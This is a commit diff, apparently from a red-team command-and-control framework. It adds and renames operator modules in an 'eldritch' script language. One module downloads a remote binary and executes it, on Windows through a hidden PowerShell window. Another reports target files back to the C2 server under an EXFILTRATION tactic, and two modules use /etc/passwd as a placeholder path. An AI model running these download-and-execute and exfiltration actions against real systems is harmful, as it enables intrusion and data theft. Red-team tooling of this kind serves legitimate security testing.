Ban upload / download

tavern/tomes/fetch_asset/main.eldritch

@@ -0,0 +1 @@
+assets.copy(input_params['src_path'], input_params['dst_path'])

tavern/tomes/fetch_asset/metadata.yml

@@ -0,0 +1,14 @@
+name: Fetch asset
+description: Move an asset from the c2 server onto the target host.
+author: hulto
+support_model: FIRST_PARTY
+tactic: EXECUTION
+paramdefs:
+- label: Destination
+  name: dst_path
+  placeholder: /etc/passwd
+  type: string
+- label: Source
+  name: src_path
+  placeholder: example/linux/test-file
+  type: string

tavern/tomes/download/main.eldritch → tavern/tomes/http_get_file/main.eldritch

@@ -1,4 +1,4 @@
-def download_file(remote_src, local_dst, insecure):
+def get_http_file(remote_src, local_dst, insecure):
     if file.is_dir(file.parent_dir(local_dst)):
         if file.is_file(local_dst):
             file.remove(local_dst)
@@ -7,7 +7,7 @@ def download_file(remote_src, local_dst, insecure):
         eprint("Specified path has no parent directory")
 
 def main():
-    download_file(
+    get_http_file(
         input_params['url'],
         input_params['dst'],
         input_params['insecure'].lower() == "true"

tavern/tomes/download/metadata.yml → tavern/tomes/http_get_file/metadata.yml

@@ -1,5 +1,5 @@
-name: Download
-description: Download a file
+name: HTTP GET file
+description: Copy a file from a remote HTTP server to the target host
 author: hulto
 support_model: FIRST_PARTY
 tactic: EXECUTION

tavern/tomes/download_and_execute/main.eldritch → tavern/tomes/http_get_file_and_execute/main.eldritch

@@ -3,10 +3,10 @@ def get_parent_process(process_name):
         if process_name == cur_proc['name']:
             return cur_proc['ppid']
 
-def download_and_execute(url):
+def http_get_and_execute(url):
     if sys.is_linux() or sys.is_macos():
         # Download
-        http.download(url, "./tmp.elf")
+        http.http_get(url, "./tmp.elf")
         sys.shell("chmod +x ./tmp.elf")
         # Execute
         sys.exec("./tmp.elf", [], True)
@@ -18,11 +18,11 @@ def download_and_execute(url):
             process.kill(ppid)
 
     elif sys.is_windows():
-        http.download(url, "./tmp.exe")
+        http.http_get(url, "./tmp.exe")
         sys.exec("powershell.exe", ["Start-Process -WindowStyle hidden ./tmp.exe"])
 
     else:
         eprint("OS not supported")
         return
 
-download_and_execute(input_params['url'])
+http_get_and_execute(input_params['url'])

tavern/tomes/download_and_execute/metadata.yml → tavern/tomes/http_get_file_and_execute/metadata.yml

@@ -1,5 +1,5 @@
-name: Download and execute
-description: Download a file and execute it. If possible background and disown the process.
+name: HTTP GET file and execute
+description: Copy a file from a remote HTTP server to the target host and execute it. If possible background and disown the process.
 author: hulto
 support_model: FIRST_PARTY
 tactic: EXECUTION

tavern/tomes/report_file/main.eldritch

@@ -0,0 +1 @@
+report.file(input_params['path'])

tavern/tomes/report_file/metadata.yml

@@ -0,0 +1,10 @@
+name: Report file
+description: Report a file on a target host back to the c2 server.
+author: hulto
+support_model: FIRST_PARTY
+tactic: EXFILTRATION
+paramdefs:
+- label: File path
+  name: path
+  placeholder: /etc/passwd
+  type: string